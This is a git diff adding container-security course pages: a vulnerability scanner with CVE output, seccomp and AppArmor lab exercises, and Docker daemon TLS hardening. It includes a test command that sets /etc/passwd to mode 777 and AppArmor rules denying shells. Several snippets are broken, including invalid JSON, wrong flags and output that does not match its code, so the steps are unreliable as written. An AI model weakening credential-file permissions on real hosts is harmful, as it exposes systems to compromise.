nginx:latest +``` + +Scan a docker images , filter for critical vulnerabilities + +```bash +./package-scanner -source nginx:latest -severity critical +``` + +Scan a docker images with CVEs + + + + +```bash +./package-scanner -source nginx:latest +INFO[2023-01-06T15:10:15+05:30] autodetect.go:91 trying to connect to endpoint 'unix:///var/run/docker.sock' with timeout '10s' +INFO[2023-01-06T15:10:15+05:30] autodetect.go:116 connected successfully using endpoint: unix:///var/run/docker.sock +INFO[2023-01-06T15:10:15+05:30] autodetect.go:91 trying to connect to endpoint 'unix:///run/containerd/containerd.sock' with timeout '10s' +WARN[2023-01-06T15:10:25+05:30] autodetect.go:124 could not connect to endpoint 'unix:///run/containerd/containerd.sock': context deadline exceeded +INFO[2023-01-06T15:10:25+05:30] autodetect.go:91 trying to connect to endpoint 'unix:///run/k3s/containerd/containerd.sock' with timeout '10s' +WARN[2023-01-06T15:10:35+05:30] autodetect.go:124 could not connect to endpoint 'unix:///run/k3s/containerd/containerd.sock': context deadline exceeded +INFO[2023-01-06T15:10:35+05:30] autodetect.go:91 trying to connect to endpoint 'unix:///var/run/crio/crio.sock' with timeout '10s' +WARN[2023-01-06T15:10:35+05:30] autodetect.go:146 could not connect to endpoint 'unix:///var/run/crio/crio.sock': dial unix /var/run/crio/crio.sock: connect: no such file or directory +INFO[2023-01-06T15:10:35+05:30] autodetect.go:184 container runtime detected: docker +INFO[2023-01-06T15:10:35+05:30] run-once.go:57 generating sbom for nginx:latest ... +INFO[2023-01-06T15:10:49+05:30] run-once.go:82 scanning sbom for vulnerabilities ... +summary: + total=142 critical=8 high=42 medium=79 low=13 ++------------------+-----------------+-------------------------------------+----------------------------------------------------+ +| CVE ID | SEVERITY | PACKAGE | DESCRIPTION | ++------------------+-----------------+-------------------------------------+----------------------------------------------------+ +| CVE-2019-1010022 | critical | libc-bin:2.31-13+deb11u5 | ** DISPUTED ** GNU Libc | +| | | | current is affected by: | +| | | | Mitigation bypass. The impact | +| | | | is: Attacker may bypass | +| | | | stack guard protection. The | +| | | | component is: nptl. The attack | +| | | | vector is: Exploit stack | +| | | | buffer overflow vulnerability | +| | | | and use this bypass | +| | | | vulnerability to bypass stack | +| | | | guard. NOTE: Upstream comments | +| | | | indicate "this is being | +| | | | treated as a non-security bug | +| | | | and no real threat." | +| CVE-2019-1010022 | critical | libc6:2.31-13+deb11u5 | ** DISPUTED ** GNU Libc | +| | | | current is affected by: | +| | | | Mitigation bypass. The impact | +| | | | is: Attacker may bypass | +| | | | stack guard protection. The | +| | | | component is: nptl. The attack | +| | | | vector is: Exploit stack | +| | | | buffer overflow vulnerability | +| | | | and use this bypass | +| | | | vulnerability to bypass stack | +| | | | guard. NOTE: Upstream comments | +| | | | indicate "this is being | +| | | | treated as a non-security bug | +| | | | and no real threat." | +| CVE-2017-9117 | critical | libtiff5:4.2.0-1+deb11u1 | In LibTIFF 4.0.7, the | +| | | | program processes BMP images | +| | | | without verifying that | +| | | | biWidth and biHeight in the | +| | | | bitmap-information header | +| | | | match the actual input, | +| | | | leading to a heap-based buffer | +| | | | over-read in bmp2tiff. | +| CVE-2019-8457 | critical | libdb5.3:5.3.28+dfsg1-0.8 | SQLite3 from 3.6.0 to and | +| | | | including 3.27.2 is vulnerable | +| | | | to heap out-of-bound read in | +| | | | the rtreenode() function when | +| | | | handling invalid rtree tables. | +| CVE-2005-2541 | critical | tar:1.34+dfsg-1 | Tar 1.15.1 does not properly | +| | | | warn the user when extracting | +| | | | setuid or setgid files, | +| | | | which may allow local users | +| | | | or remote attackers to gain | +| | | | privileges. | +| CVE-2022-3970 | critical | libtiff5:4.2.0-1+deb11u1 | A vulnerability was found in LibTIFF. | +| | | | It has been classified as critical. This | +| | | | affects the function TIFFReadRGBATileExt | +| | | | of the file libtiff/tif_getimage.c. | +| | | | The manipulation leads to integer | +| | | | overflow. It is possible to initiate | +| | | | the attack remotely. The exploit has | +| | | | been disclosed to the public and may | +| | | | be used. The name of the patch is | +| | | | 227500897dfb07fb7d27f7aa570050e62617e3be. | +| | | | It is recommended to apply a patch to fix | +| | | | this issue. The identifier VDB-213549 was | +| | | | assigned to this vulnerability. | +| CVE-2022-32221 | critical | libcurl4:7.74.0-1.3+deb11u3 | When doing HTTP(S) transfers, | +| | | | libcurl might erroneously | +| | | | use the read callback | +| | | | (`CURLOPT_READFUNCTION`) to | +| | | | ask for data to send, even | +| | | | when the `CURLOPT_POSTFIELDS` | +| | | | option has been set, if the | +| | | | same handle previously was | +| | | | used to issue a `PUT` request | +| | | | which used that callback. | +| | | | This flaw may surprise the | +| | | | application and cause it to | +| | | | misbehave and either send off | +| | | | the wrong data or use memory | +| | | | after free or similar in the | +| | | | subsequent `POST` request. The | +| | | | problem exists in the logic | +| | | | for a reused handle when it is | +| | | | changed from a PUT to a POST. | +| CVE-2022-32221 | critical | curl:7.74.0-1.3+deb11u3 | When doing HTTP(S) transfers, | +| | | | libcurl might erroneously | +| | | | use the read callback | +| | | | (`CURLOPT_READFUNCTION`) to | +| | | | ask for data to send, even | +| | | | when the `CURLOPT_POSTFIELDS` | +| | | | option has been set, if the | +| | | | same handle previously was | +| | | | used to issue a `PUT` request | +| | | | which used that callback. | +| | | | This flaw may surprise the | +| | | | application and cause it to | +| | | | misbehave and either send off | +| | | | the wrong data or use memory | +| | | | after free or similar in the | +| | | | subsequent `POST` request. The | +| | | | problem exists in the logic | +| | | | for a reused handle when it is | +| | | | changed from a PUT to a POST. | +| CVE-2021-33560 | high | libgcrypt20:1.8.7-6 | Libgcrypt before 1.8.8 and | +| | | | 1.9.x before 1.9.3 mishandles | +| | | | ElGamal encryption because | +| | | | it lacks exponent blinding | +| | | | to address a side-channel | +| | | | attack against mpi_powm, | +| | | | and the window size is not | +| | | | chosen appropriately. This, | +| | | | for example, affects use of | +| | | | ElGamal in OpenPGP. | +| CVE-2019-20838 | high | libpcre3:2:8.39-13 | libpcre in PCRE before 8.43 | +| | | | allows a subject buffer | +| | | | over-read in JIT when UTF | +| | | | is disabled, and \X or \R | +| | | | has more than one fixed | +| | | | quantifier, a related issue to | +| | | | CVE-2019-20454. | +| CVE-2022-29458 | high | ncurses-base:6.2+20201114-2 | ncurses 6.3 before patch | +| | | | 20220416 has an out-of-bounds | +| | | | read and segmentation | +| | | | violation in convert_strings | +| | | | in tinfo/read_entry.c in the | + + + + + +``` + +## docker image standlone scanner + +```bash +docker run --rm -v /var/run/docker.sock:/var/run/docker.sock sangam14/package-scanner:latest -source nginx:latest +``` diff --git a/content/en/containersecurity/b2.containervsVM 2.md b/content/en/containersecurity/b2.containervsVM 2.md new file mode 100644 index 0000000..34939b6 --- /dev/null +++ b/content/en/containersecurity/b2.containervsVM 2.md @@ -0,0 +1,71 @@ +--- +title: "Container vs Virtualization" +description: "The introduction to this course." +slug: "Container-vs-Virtualization" +--- + +### A Shift from Monolithic to Microservice Architecture + +## Monolithic + +Application have changed dramarically +- A Decade Ago ( and still valid ) + - Apps were monolithic + - Built on single stack such as .NET or Java + - Long Lived + - Deployed to a single server + +Benefits of monolith - Simple to Develop , Test , Deplot & Scale + - simple to develope because of all the tools and IDEs aupport to that kind of application by default + - easy to deploy because all coponets are packed into one bundle + - Easy to scale the whole application + +Disadvantages of monolith + - Very difficult to maintain + - One Component failure will cause the whole system to fail + - Very difficult to understand and create the patches for monolithic applications + - Take a long time to startup because all the components need to get started + +## Microservice + +Today + - Apps are constantly developed + - Build from losely coupled components + - New version are deployed often + - Deployed to a multitude of server + + +## shipping code is damm too hard + +an efforts to solve complet problem + +![](./images/solve-problem.png) + +## every possible good to ship X every possible way to ship + +![](./images/pssiblewaytoship.png) + +## Enter ... Internodal container + +![](./images/intermodl-container.png) + + +## Thats what Docker all about +![](./images/whatdocker.png) + + + +## Comparing Docker vs VM + +| Virtual Machine | Docker | +|-|-| +| each VM runs its own os | Container is just a user space of OS | +| Boot up time os in minutes | Containers instantiate in seconds | +| VMs snapshots are used sparingly | Images are built incrementaly on top of another layers . lot of images /snapshots | +| Not effective diffs . No versiob controlled | Images can be version controlled docker hub is like GITHUB | +| Cannot run more than couple of VMs on an aveage laptop | Can run many docker containers in a laptop | +| Only one VM can be stated from one set of VMX and VMDK file | Multiple Docker Containers can be started from one Docker images | + + + + diff --git a/content/en/containersecurity/b20.SecComp-AppArmor 2.md b/content/en/containersecurity/b20.SecComp-AppArmor 2.md new file mode 100644 index 0000000..a4d47f5 --- /dev/null +++ b/content/en/containersecurity/b20.SecComp-AppArmor 2.md @@ -0,0 +1,604 @@ +--- +title: "Docker host security configurations" +slug: "Docker-host-security-configurations" +--- + +## SecComp and AppArmor + +Docker works with major Linux MAC technologies such as AppArmor and SELinux. + +Depending on your Linux distribution, Docker applies a default AppArmor profile to all new containers. According to the Docker documentation, this default profile is β€œmoderately protective while providing wide application compatibility”. + +Docker also lets you start containers without a policy applied, as well as giving you the ability to customize policies to meet specific requirements. This is also very powerful, but can also be prohibitively complex. + +## seccomp + +Docker uses seccomp, in filter mode, to limit the syscalls a container can make to the host’s kernel. + +As per the Docker security philosophy, all new containers get a default seccomp profile configured with sensible defaults. This is intended to provide moderate security without impacting application compatibility. + +![](./images/seccomp.png) + +As always, you can customize seccomp profiles, and you can pass a flag to Docker so that containers can be started without a seccomp profile. + +As with many of the technologies already mentioned, seccomp is extremely powerful. However, the Linux syscall table is long, and configuring the appropriate seccomp policies can be prohibitively complex. + +# Concluding Linux security technologies + +Docker supports most of the important Linux security technologies and ships with sensible defaults that add security but aren’t too restrictive. The figure below shows how these technologies form multiple layers of potential security. + +Some of these technologies can be complicated to customize as they require deep knowledge of how the Linux kernel works. Hopefully, they will get simpler to configure in the future, but for now, the default configurations that ship with Docker might be a good place to start. + + + +## SecComp Exercise 1 + + +```bash +grep SECCOMP /boot/config-$(uname -r) +``` +get the fitst test for seccomp in strict mode + +```seccomp_strict.c +#include +#include +#include +#include +#include +#include + + +int main(int argc, char **argv) +{ + int output = open("output.txt", O_WRONLY); + const char *val = "test"; + + printf("Calling prctl() to set seccomp strict mode...\n"); + prctl(PR_SET_SECCOMP, SECCOMP_MODE_STRICT); + + printf("Writing to an already open file...\n"); + write(output, val, strlen(val)+1); + + printf("Trying to open file for reading...\n"); + int input = open("output.txt", O_RDONLY); + + printf("You will not see this message--the process will be killed first\n"); +} +``` + +```bash +sudo gcc seccomp_stric.c -o seccomp_strict +./seccomp_strict +``` + +open()system call is not allowed by secccomp strict mode + +get the file ro test for seccomp in filter mode + +```c +#include +#include +#include +#include + +void main(void) +{ + /* initialize the libseccomp context */ + scmp_filter_ctx ctx = seccomp_init(SCMP_ACT_KILL); + + /* allow exiting */ + seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit_group), 0); + + /* allow getting the current pid */ + seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(getpid), 0); + + /* allow changing data segment size, as required by glibc */ + seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(brk), 0); + + /* allow writing up to 512 bytes to fd 1 */ + seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(write), 2, + SCMP_A0(SCMP_CMP_EQ, 1), + SCMP_A2(SCMP_CMP_LE, 512)); + + /* if writing to any other fd, return -EBADF */ + seccomp_rule_add(ctx, SCMP_ACT_ERRNO(EBADF), SCMP_SYS(write), 1, + SCMP_A0(SCMP_CMP_NE, 1)); + + /* load and enforce the filters */ + seccomp_load(ctx); + seccomp_release(ctx); + + printf("this process is %d\n", getpid()); +} + +``` + +we have first initiazed the seccomp in filter mode . previouly have used `prctl(PR_SET_SECCOMP, SECCOMP_MODE_STRICT);` to set the seccomp in strict mode . + +```bash +sudo gcc seccomp_bpf.c -o seccomp_bpf +``` +install libseccomp-dev + +```bash +sudo apt-get install libseccomp-dev +``` + + +```bash +sudo gcc seccomp_bpf.c -o seccomp_bpf -lseccomp +``` + +```bash +./seccomp_bpf +``` + +output + +```bash +initiating seccomp ... +add rule to allow exit_group +add rule to allow getpid +add rule to allow brk +add rule to allow write upto 512 bytes to fd 1 +add rule to allow write to any other fd except 1 +loading seccomp filter ... + +``` + +inspecting the output one can look here that all the rules added to seccomp BPF folter with a process +ID since we have added the rule to allow getpid() system call . + + + +open seccomp_bpf.c and add the following code to the end of the file + + +```c +#include +#include +#include +#include +#include +#include + +/* "mov al,42; ret" aka "return 42" */ +static const unsigned char code[] = "\xb0\x2a\xc3"; + +void main(void) +{ + int fd[2], ret; + + /* spawn child process, connected by a pipe */ + pipe(fd); + if (fork() == 0) { + close(fd[0]); + + /* enter mode 1 seccomp and execute untrusted bytecode */ + prctl(PR_SET_SECCOMP, SECCOMP_MODE_STRICT); + ret = (*(uint8_t(*)())code)(); + + /* send result over pipe, and exit */ + write(fd[1], &ret, sizeof(ret)); + syscall(SYS_exit, 0); + } else { + close(fd[1]); + + /* read the result from the pipe, and print it */ + read(fd[0], &ret, sizeof(ret)); + printf("untrusted bytecode returned %d\n", ret); + } +} + +``` + +```bsh +$ suod gcc seccomp_bpf.c -o seccomp_bpf2 -lseccomp +$ ./seccomp_bpf2 +initiating seccomp ... +add rule to allow exit_group +add rule to allow getpid +add rule to allow brk +add rule to allow write upto 512 bytes to fd 1 +add rule to allow write to any other fd except 1 +loading seccomp filter ... +this process is -9 +``` + + +## seccomp in docker + +step 1. check the SECCOMP is working and configured in docker daemon + +```bash +docker info | grep seccomp +``` + +step 2. check the seccomp profile of the container + +```bash +docker inspect --format='{{json .HostConfig.SecurityOpt}}' +``` + +seccomp-profiles/deny.json + +```json +{ + "defaultAction": "SCMP_ACT_ERRNO", + "architectures": [ + "SCMP_ARCH_X86_64", + "SCMP_ARCH_X86", + "SCMP_ARCH_X32" + ], + "syscalls" : [ + + ] +} + +``` + +a docker seccomp profile consists of 3 required entries viz. defaultAction, architectures and syscalls. the possible action of precedence are + +* SCMP_ACT_KILL + - kill with am status of 0x80 + 31(SIGSYS) = 159 +* SCMP_ACT_TRAP + - send SIGSYS signal without executing the syscall +* SCMP_ACT_ERRNO + - set erno withou executing the syscall +* SCMP_ACT_TRACE + - invoke a ptrace to make a decision or set errno to Enosys +* SCMP_ACT_ALLOW + - allow the syscall to execute + +``` + +docker run --security-opt seccomp=seccomp-profiles/deny.json -it ubuntu bash +``` +using `--security-opt seccomp=seccomp-profiles/deny.json` we have set the seccomp profile to the container . +notice here that since not even single system call is allwoed , the docker container is not able to run . + + + +create sc-custom.json + +```json +{ + "defaultAction": "SCMP_ACT_ALLOW", + "architectures": [ + "SCMP_ARCH_X86_64", + "SCMP_ARCH_X86", + "SCMP_ARCH_X32" + ], + "syscalls" : [ + { + "names":"mkdir", + "action": "SCMP_ACT_ALLOW", + "args::[] + + }, + { + "names": "chmod" , + "action": "SCMP_ACT_ERRNO", + "args::[] + } + + ] +} + +``` + +before going to run this commands see what +all system call actally take place while hitting mkdir command inside an alphine +container using strace + +```bash +docker run -rm -it --security-opt seccomp=unconfined alphine sh +``` + +```bash +apk add strace +strace mkdir test +exit +``` + +we have installed strace utility inside the container and then run the mkdir command .the system call oberved include `execve ` , +`arch_prtctl` ` mprotect` `brk` `access` `openat` `mkdirat` `fstat` `close` `exit_group` . test directory is created inside the container . + + +Now run another contaiet with same aphine image with new `sc-custom.json` seccomp profile . + +```bash +docker run -rm -it --security-opt seccomp=sc-custom.json alphine sh +``` + +```bash +ls +mkdir test +``` +mkdir: can't create directory 'test': Operation not permitted + +```bash +# chmod /etc/ +``` +clearly , the seccomp profile attavhed is blocking the mkdir and chmod system call . +lets comfirm it with strace utility agin + + +```bash +apk add strace +strace mkdir test +``` + +as expected the systm call got rejected with `Operation not permitted` error . since also we have added a deny condition for chmod system call . + +Run a docker container with the same seccomp file with chmpd over file 777 permission + +```bash +$ docker run -rm -it --security-opt seccomp=sc-custom.json alphine sh chmod 777 /etc/passwd +``` +this os also denyed by the seccomp profile . + +for more play with `default.json` seccomp +profile available on moby github repo + + + +## app armor + +appArmor is a MAC (Mandatory Access Control) system that is used to restrict the access of a process to the system resources . its implements a task centered policy with task +"profile" being created and loaded from user space + +tasks on the syste, that do not have profi;e defined for them run an uncofined state which is equivalant to standared Linux DAC (Discretionary Access Control) . permissions . + +appArmor works on file paths . it comes as default LSM for ubuntu and SUSE . + +1. let check our dpcler version and service status + +```bash + +$ docker version +$ systemctl status docker +``` + + + +2. check AppArmor in docker info + +```bash +docker info -f '{{json .SecurityOptions}}' +``` + +3. chheck AppArmor status . it might required sudo access + +```bash +$ apparmor_status +$ sudo apparmor_status +``` +this will provide us the infromation about all the profile loaded and the mode of profiles with process + +the apparmor_status and aa-status can used interchangeably . just check if they are available with your system installation or not gernerally they comes in package call +`apparmor-utils` . +```bash + +$ which apparmor_status +$ which aa-status +``` +and one can gain insight about the number of profile also + +```bash +$ sudp aa-status --help +$ sudo aa-status --enabled [No error output means apparmor is enabled] +$ sudo aa-status --profiles [prints the no of loaded policies ] +$ sudo aa-status --enforce [prints the no of enforced policies ] + +``` + +Install an AppArmor Profile generator tool called `bane` + +```bash +# Export the sha256sum for verification. +$ export BANE_SHA256="e70b1d67333975eb705b08045de9558483daae05792a1ff28dcec28d4c164386" + +# Download and check the sha256sum. +$ curl -fSL "https://github.com/genuinetools/bane/releases/download/v0.4.4/bane-freebsd-amd64" -o "/usr/local/bin/bane" \ + && echo "${BANE_SHA256} /usr/local/bin/bane" | sha256sum -c - \ + && chmod a+x "/usr/local/bin/bane" + +$ echo "bane installed!" + +# Run it! +$ bane -h +``` + +get the sample TOML file for creation of AppArmor profile from bane Github + + +```bash +$ sudo curl -o sample.toml https://raw.githubusercontent.com/genuinetools/bane/master/sample.toml +$ ls +``` +the parts of the sample.toml file are + +a. `name` key value pair is the name of the profile . + +``` +# name of the profile, we will auto prefix with `docker-` +# so the final profile name will be `docker-nginx-sample` +Name = "nginx-sample" + +``` + +b . `Filesystem ` table with different arrays like ReadOnlyPaths , LogOnWritePaths , WritePaths , ReadPaths , NoAccessPaths , ReadOnlyPaths . + +```bash + +[Filesystem] +# read only paths for the container +ReadOnlyPaths = [ + "/bin/**", + "/boot/**", + "/dev/**", + "/etc/**", + "/home/**", + "/lib/**", + "/lib64/**", + "/media/**", + "/mnt/**", + "/opt/**", + "/proc/**", + "/root/**", + "/sbin/**", + "/srv/**", + "/tmp/**", + "/sys/**", + "/usr/**", +] + +# paths where you want to log on write +LogOnWritePaths = [ + "/**" +] + +# paths where you can write +WritablePaths = [ + "/var/run/nginx.pid" +] + +# allowed executable files for the container +AllowExec = [ + "/usr/sbin/nginx" +] + +# denied executable files +DenyExec = [ + "/bin/dash", + "/bin/sh", + "/usr/bin/top" +] + +``` + +C. Capabilties table allow array for allowing Linux capabilities . + +```toml +# allowed capabilities +[Capabilities] +Allow = [ + "chown", + "dac_override", + "setuid", + "setgid", + "net_bind_service" +] + + +``` + +D . Network table with Raw , Packet , Protocols array . + +```toml + +[Network] +# if you don't need to ping in a container, you can probably +# set Raw to false and deny network raw +Raw = false +Packet = false +Protocols = [ + "tcp", + "udp", + "icmp" +] + +``` + +build the sample file with bane and check apparmor status if this profile gets enforced + +```bash +$ sudo bane sample.toml +$ sudo aa-status | grep docker + +``` +notice that there was already loaded `docker-default` profile . + + +```bash +$ sudo ls /etc/apparmor.d/containers/ +docker-ngnix-sample +``` + +```bash +sudo cat /etc/apparmor.d/containers/docker-nginx-sample +``` + +```c + #include + + profile docker-nginx-sample flags=(attach_disconnected,mediate_deleted) { + #include + #include + #include + + /bin/** r, + /boot/** r, + /dev/** r, + /etc/** r, + /home/** r, + /lib/** r, + /lib64/** r, + /media/** r, + /mnt/** r, + /opt/** r, + /proc/** r, + /root/** r, + /sbin/** r, + /srv/** r, + /tmp/** r, + /sys/** r, + /usr/** r, + /var/run/nginx.pid rw, + /usr/sbin/nginx ix, + deny /bin/dash ix, + deny /bin/sh ix, + deny /usr/bin/top ix, + capability chown, + capability dac_override, + capability setuid, + capability setgid, + capability net_bind_service, + network raw, + network packet, + deny network raw, + deny network packet, + deny network tcp, + deny network udp, + deny network icmp, + } + + ..... + +``` + +Apply the above bane generated profile to the container before that lets +analyze some commands that we can perfectly run within a container not attached to this profile + + +```bash +$ docker run -it --rm --name without-aa -p 4444:80 nginx bash +# sh +# dash +# bash +# exit +# exist +``` +in this ngnix container we are able to run many variants of shell like bash sh and dash without any error + + +now attach th profile and try to achive the same + +```bash +$ docker run -it --rm --name with-aa --security-opt="apparmor:docker-nginx-sample" -p 4444:80 nginx bash +``` +As expected, the attached AppArmor profile is not allowing us to spawn shells inside the container. This is how an AppArmor profile can be attached to a Docker container using `--security-opt` and the different executables and capabilities can be controlled. Till now, we have seen that Docker uses many Linux technologies, such as Capabilities, AppArmor and SecComp for defense. However, AppArmor can protect a Docker Host even when the other lines of defense such as SecComp and Capabilities are not effective. Remember that if you are not explicitly defining any AppArmor profile, the `default-docker` AppArmor profile will get automatically attached. Until and unless `--security-opt apparmor=unconfined` is not present during the container run command execution `default-docker` + apparmor profile will be remain loaded . + + \ No newline at end of file diff --git a/content/en/containersecurity/b21.docker-daemon-sec 2.md b/content/en/containersecurity/b21.docker-daemon-sec 2.md new file mode 100644 index 0000000..1142cd0 --- /dev/null +++ b/content/en/containersecurity/b21.docker-daemon-sec 2.md @@ -0,0 +1,426 @@ +--- +title: "Docker Daemon security configurations" +slug: "Docker-Daemon-security-configurations" +--- + + + # docker daemon security configuration + + +Install docker CE 19.03 + +```bash + +# yum install -y yum-utils device-mapper-persistent-data lvm2 +# yum-config-manager --add-repo https://download.docker.com/linux/centos/docker-ce.repo + +# yum install -y docker-ce + +[root@localhost docker]# docker --version +Docker version 19.03.8, build afacb8b + +``` + + +# Daemon security configuration + +There is no configuration file by default, which needs to be created separately/etc/docker/daemon.json, the following configurations are all local test examples configured on this file. + + +```json +{ + "icc": false, + "log-level": "info", + "log-driver": "json-file", + "log-opts": { + "max-size": "10m", + "max-file":"5", + "labels": "somelabel", + "env": "os,customer" + }, + "iptables": true, + "userns-remap": "default", + "userland-proxy": false, + "experimental": false, + "selinux-enabled": true, + "live-restore": true, + "no-new-privileges": true, + "cgroup-parent": "/foobar", + "seccomp-profile": "/etc/docker/seccomp/default-no-chmod.json", + "tls": true, + "tlsverify": true, + "tlscacert": "/etc/docker/CA/ca.pem", + "tlscert": "/etc/docker/CA/server-cert.pem", + "tlskey": "/etc/docker/CA/server-key.pem" +} + + +``` + +# configure access to docker daemon through HTTPS and certificate authentication + +Server certificate + +Create a host and define a domain (IP can also be used). The corresponding certificate will be generated according to the domain. It is generally used to register the CN in the certificate: + +Create certificate Directory: + +```bash +$ mkdir -p /etc/docker/dockerd/CA && cd /etc/docker/dockerd/CA +``` + + +Generate the key certificate and fill in the key certificate password twice: +```bash +$ openssl genrsa -aes256 -out ca-key.pem 4096 +``` +To generate a CA certificate, you need to enter the basic information of the registration certificate: +```bash +$ openssl req -new -x509 -days 365 -key ca-key.pem -sha256 -out ca.pem +``` +Create server certificate: + +```bash +$ openssl genrsa -out server-key.pem 4096 + +$ openssl req -subj "/CN=localhsot" -sha256 -new -key server-key.pem -out server.csr +``` + +Set the IP address specified by the certificate: + + +```bash +$ echo subjectAltName = DNS:localhost,IP:127.0.0.1 >> extfile.cnf +``` +Set the extended usage property of the docker daemon key to server authentication only: +```bash +$ echo extendedKeyUsage = serverAuth >> extfile.cnf +``` +Generate server cert certificate: +```bash +$ openssl x509 -req -days 3650 -sha256 -in server.csr -CA ca.pem -CAkey ca-key.pem -CAcreateserial -out server-cert.pem -extfile extfile.cnf +``` +Client certificate + +Create client certificate: (or current directory) +```bash +$ openssl genrsa -out key.pem 4096 +$ openssl req -subj '/CN=localhost' -new -key key.pem -out client.csr + +``` +To make the key suitable for client authentication, create an extended profile: + + +```bash +$ echo extendedKeyUsage = clientAuth >> extfile.cnf +``` + +Generate client cert certificate: + +```bash +$ openssl x509 -req -days 3650 -sha256 -in client.csr -CA ca.pem -CAkey ca-key.pem -CAcreateserial -out cert.pem -extfile extfile.cnf + +``` + +use + +Give corresponding permissions to the certificate: + +```bash +$ chmod -v 0400 ca-key.pem key.pem server-key.pem +$ chmod -v 0444 ca.pem server-cert.pem cert.pem + +[root@localhost CA]# ls +ca-key.pem ca.pem ca.srl cert.pem client.csr extfile.cnf key.pem server-cert.pem server.csr server-key.pem + +``` +Server configuration /etc/docker/daemon.json + +```json + +"tls": true, +"tlsverify": true, +"tlscacert": "/etc/docker/CA/ca.pem", +"tlscert": "/etc/docker/CA/server-cert.pem", +"tlskey": "/etc/docker/CA/server-key.pem" +``` + +Client configuration + +Set the client certificate on the server and place it in the corresponding location: + +```bash +$ cp -v {ca,cert,key}.pem ~/.docker +$ export DOCKER_HOST=tcp://$HOST:2376 DOCKER_TLS_VERIFY=1 + +``` + +Simulate the test as follows: + +```json +$ curl https://$HOST:2376/images/json + --cert ~/.docker/cert.pem + --key ~/.docker/key.pem + --cacert ~/.docker/ca.pem + +[{"Containers":-1,"Created":1540777343,"Id":"sha256:55e7b305dc477345434ce3bd3941940481f982eea31c8f28c0670d59c63d544b","Labels":nu +``` + +# using namespace isolation technology + +Namespace is an isolation technology. Docker uses the isolation technology to open a specific namespace and create some special processes, but the use of namespace is conditional. The system will create a dockremap and map it to the container through the ID values corresponding to / etc / subuid and / etc / subuid; The actual situation still uses the ordinary permission of dockremap to achieve the effect of automatic isolation. + + + +Modify first/etc/sysctl.conf +```conf +# echo β€œuser.max_user_namespaces=15076” >> /etc/sysctl.conf +``` +stay /etc/docker/daemon.json Add the configuration item β€œuserns remap”: β€œdefault” + +Be careful when modifying this configuration. If you have deployed a set of docker environment, after enabling this option, you will switch to the isolated environment, and the previous docker container will not be used! + + +``` + +[root@localhost docker]# cat /etc/subuid +dockremap:100000:65536 + +``` + +# setting the partition of docker + +Create a separate partition for the container. The default partition isvarlibdocker, including local images, containers, networks and other related things. + +```bash + +root@localhost docker]# ls /var/lib/docker +``` + +100000.100000 builder buildkit containers image network overlay2 plugins runtimes swarm tmp trust volumes + +You can use β€œdata root”: β€œto configure the default partition location. + +# limit traffic between default bridge containers + +When the docker service is started, a forwarding policy will be added to the forward chain of iptables by default. Whether the policy is accept or drop depends on whether β€” ICC = true (default) or β€” ICC = false is configured. If β€” iptables = false is manually specified, iptables rules will not be added. + + +By default, all network communication is allowed between containers on the same host on the default bridge. If not required, the communication between all containers is limited. Link specific containers that need to communicate together, or create a custom network and join only containers that need to communicate with the custom network. + + +Configure to limit the traffic β€œICC” between containers on the default bridge: false + +# configuration log + +Configure the centralized remote log, set the log process β€” log level level to info, log record format JSON, local log record + +```json + +"log-level": "info", +"log-driver": "json-file", +"log-opts": { + "max-size": "10m", + "max-file":"5", + "labels": "somelabel", + "env": "os,customer" +}, + +``` + +![Alt text](./images/config-remote.jpg) + + +The docker logging driver receives the container log and forwards it to a remote destination or file. The default logging driver isjson-file。 It stores container logs on local disk in JSON format. Docker has a plug-in architecture for logging, so there are plug-ins for open source tools and commercial tools: + + +Journaled – stores the container log in the system log + +Syslog driver – supports UDP, TCP, TLS + +Fluent D – supports connecting TCP or UNIX sockets to fluent D + +Splunk – http / HTTPS forwarding to Splunk server + +Gel – UDP logs forwarded to graylog2 + +Example fluent + + +``` +{ + "log-driver": "fluentd", + "log-opts": { + "fluentd-address": "fluentdhost:24224" + } + } + +``` + +Using syslog + +``` +{ + "log-driver": "syslog", + "log-opts": { + "syslog-address": "udp://1.2.3.4:1111" + } +} +``` + +# setting ulimit + + +``` +{ + "default-ulimits": { + "nofile": { + "Name": "nofile", + "Hard": 64000, + "Soft": 64000 + } + } +} +``` + +# setting CGroup + +The cggroup parent option allows you to set the default cggroup parent for the container. If this option is not set, the default value for FS CGroup driver is / docker; For SYSTEMd CGroup driver, the default is system slice 。 + +If CGroup has a forward slash (/), CGroup is created under the root CGroup, otherwise CGroup is created under the daemon CGroup. + + +Assuming that the daemon runs in CGroup daemon CGroup, then β€” CGroup parent = / foobar creates a CGroup in / sys / FS / CGroup / memory / foobar, while β€” CGroup parent = foobar creates a CGroup/sys/fs/cgroup/memory/daemoncgroup/foobar Create CGroup in. + +SYSTEMd CGroup driver has different rules for – CGroup parent. System D represents the hierarchy by slice, and the name of the slice encodes the position in the tree. Therefore, the β€” CGroup parent of SYSTEMd CGroup should be the slice name. Names can contain a series of names separated by dashes that describe the path from the root slice to the slice. For example, β€” CGroup parent = user-a-b.slice indicates that the memory of the container is CGroup /sys/fs/cgroup/memory/user.slice/user-a.slice/user-a-b.slice/docker-.scope Created in. + +You can also use container run to set it. Using the β€” CGroup parent option on docker create and docker run will take precedence over the β€” CGroup parent option on the daemon. + + +# configuring seccomp + +For the test configuration file used, it is forbidden to use the Chmod command in docker + +``` +https://github.com/docker/labs/blob/master/security/seccomp/seccomp-profiles/default-no-chmod.json +[root@localhost docker]# docker run --rm -it alpine sh +/ # ls bin etc lib mnt proc run srv tmp var +dev home media opt root sbin sys usr / # touch foo.sh +/ # chmod +x foo.sh +chmod: foo.sh: Operation not permitted +/ # exit + + + + +``` +It can actually complete some system related calls of prohibition, permission and alarm. Refer to:https://github.com/torvalds/linux/blob/master/arch/x86/entry/syscalls/syscall_64.tbl + +# disable the experimental function of docker + +Set β€œexperimental”: false + +2.11 restrict containers from raising rights through suid or sgid + +The no new privileges security option prevents application processes within the container from gaining new privileges during execution. + +For example: there is a program with setuid / setgid bit set in the image, such as sudo. The process in the container also has (file) permission to execute the program. Any operation attempting to obtain privileges through facilities such as setuid / setgid will be rejected. + +# Daemon configuration example description (Linux) + + +```bash +{ + "authorization-plugins": [],//access authorization plugin + "data-root": "", //the root directory of docker data persistent storage, the default is /var/lib/docker + "dns": [], //DNS server + "dns-opts": [],//DNS configuration options, such as ports, etc. + "dns-search": [],//DNS search domain name + 